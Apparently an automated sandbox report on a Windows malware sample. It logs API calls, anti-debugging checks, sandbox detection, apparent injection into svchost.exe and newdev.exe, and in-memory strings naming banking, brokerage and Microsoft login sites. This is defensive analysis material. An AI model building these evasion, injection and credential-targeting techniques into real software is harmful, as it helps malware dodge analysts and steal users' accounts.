Source:	Binary string: wntdll.pdbUGP source: 25IvlOVEB1.exe, 00000000.00000003.2180759014.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2181914007.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2869883163.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2871497108.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.000000000496E000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2966847006.0000000004466000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2969739068.000000000461C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 25IvlOVEB1.exe, 00000000.00000003.2180759014.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2181914007.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2869883163.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2871497108.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.000000000496E000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2966847006.0000000004466000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2969739068.000000000461C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2934769945.000000000342A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934754689.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934637581.000000000341B000.00000004.00000020.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000002.4049277555.000000000095E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2934769945.000000000342A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934754689.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934637581.000000000341B000.00000004.00000020.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000002.4049277555.000000000095E000.00000004.00000020.00020000.00000000.sdmp

Source: 25IvlOVEB1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 25IvlOVEB1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 25IvlOVEB1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 25IvlOVEB1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 25IvlOVEB1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00074B37 LoadLibraryA,GetProcAddress,

0_2_00074B37

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_00098945 push ecx; ret	0_2_00098958
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000BFF02 push edi; retn 000Bh	0_2_000BFF19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D03B push es; iretd	2_2_0040D0A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004070B1 push 64620B57h; iretd	2_2_004070E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403170 push eax; ret	2_2_00403172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D2EE pushfd ; retf	2_2_0040D336
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EC00 pushad ; retf	2_2_0041EC7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414559 push eax; retf	2_2_00414571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D5CE push ss; ret	2_2_0040D5D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A6D3 push FFFFFFFEh; ret	2_2_0041A68F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A754 push edi; iretd	2_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A77F push edi; iretd	2_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004137D3 pushfd ; ret	2_2_004137F4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418FE9 push ds; ret	2_2_00418FF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A783 push edi; iretd	2_2_0041A78C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0225F pushad ; ret	2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B027FA pushad ; ret	2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx	2_2_03B309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0283D push eax; iretd	2_2_03B02858

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000748D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_000748D7
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000F5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_000F5376

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00093187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00093187

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	API/Special instruction interceptor: Address: 14B3234
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 25IvlOVEB1.exe, 00000000.00000003.2170837604.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2173480019.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2170205431.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2173674754.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2171124802.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2195736685.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2168742524.0000000001544000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2171539530.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2170041908.000000000158F000.00000004.00000020.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2170763828.000000000158F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXEB

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\newdev.exe TID: 2876	Thread sleep time: -58000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe TID: 6804	Thread sleep time: -40000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\newdev.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\newdev.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000D445A
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DC6D1 FindFirstFileW,FindClose,	0_2_000DC6D1
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000DC75C
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000DEF95
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000DF0F2
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000DF3F3
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000D37EF
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000D3B12
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000DBCBC

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000749A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000749A0

Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: E8-03HaL.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: E8-03HaL.8.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: E8-03HaL.8.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: E8-03HaL.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: E8-03HaL.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: E8-03HaL.8.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: newdev.exe, 00000008.00000002.4049026110.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.3273767376.000001CB0107D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: E8-03HaL.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: E8-03HaL.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: E8-03HaL.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: E8-03HaL.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: E8-03HaL.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: E8-03HaL.8.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: E8-03HaL.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: E8-03HaL.8.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: E8-03HaL.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: E8-03HaL.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: E8-03HaL.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050099928.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: E8-03HaL.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: E8-03HaL.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	API call chain: ExitProcess graph end node			graph_0-101038
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	API call chain: ExitProcess graph end node			graph_0-100939

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03B7096E rdtsc

2_2_03B7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417723 LdrLoadDll,

2_2_00417723

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000E3F09 BlockInput,

0_2_000E3F09

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00073B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00073B3A

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000A5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_000A5A7C

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_00074B37 LoadLibraryA,GetProcAddress,

0_2_00074B37

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_014B3500 mov eax, dword ptr fs:[00000030h]	0_2_014B3500
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_014B34A0 mov eax, dword ptr fs:[00000030h]	0_2_014B34A0
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_014B1E70 mov eax, dword ptr fs:[00000030h]	0_2_014B1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]	2_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]	2_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]	2_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]	2_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]	2_2_03C0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]	2_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]	2_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03BD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]	2_2_03C062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
